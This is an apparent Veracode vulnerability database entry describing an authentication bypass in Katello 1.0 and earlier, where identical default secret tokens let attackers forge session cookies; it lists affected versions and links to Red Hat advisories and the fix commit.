Authentication Bypass

2019-01-1508:56:05

Veracode Vulnerability Database

sca.analysiscenter.veracode.com

0.015 Low

EPSS

Percentile

87.1%

JSON

katello is vulnerable to authentication bypass attacks. The vulnerability exists as the installation script in Katello 1.0 and earlier does not properly generate the Application.config.secret_token value, which causes each default installation to have the same secret token, and allows remote attackers to authenticate to the CloudForms System Engine web interface as an arbitrary user by creating a cookie using the default secret_token.

CPENameOperatorVersion
katelloeq0.3.3__1.el6_2
katelloeq0.1.238__3.el6
katelloeq0.1.307__1.el6

Name	Operator	Version
katello	eq	0.3.3__1.el6_2
katello	eq	0.1.238__3.el6
katello	eq	0.1.307__1.el6

References

rhn.redhat.com/errata/RHSA-2012-1186.html

rhn.redhat.com/errata/RHSA-2012-1187.html

secunia.com/advisories/50344

www.securityfocus.com/bid/55140

access.redhat.com/knowledge/docs/en-US/CloudForms/1.0/html/Release_Notes/chap-Release_Notes-Updates.html#chap-Release_Notes-Updates-System_Engine

access.redhat.com/security/updates/classification/#important

github.com/Katello/katello/commit/7c256fef9d75029d0ffff58ff1dcda915056d3a3

github.com/Katello/katello/pull/499